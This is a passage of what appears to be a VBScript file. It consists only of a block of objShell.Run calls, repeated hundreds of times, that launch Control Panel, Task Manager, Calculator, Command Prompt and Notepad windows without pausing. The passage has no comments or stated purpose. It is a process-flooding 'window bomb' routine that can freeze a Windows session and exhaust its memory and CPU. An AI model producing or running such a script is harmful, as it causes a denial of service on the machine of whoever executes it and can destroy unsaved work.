objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

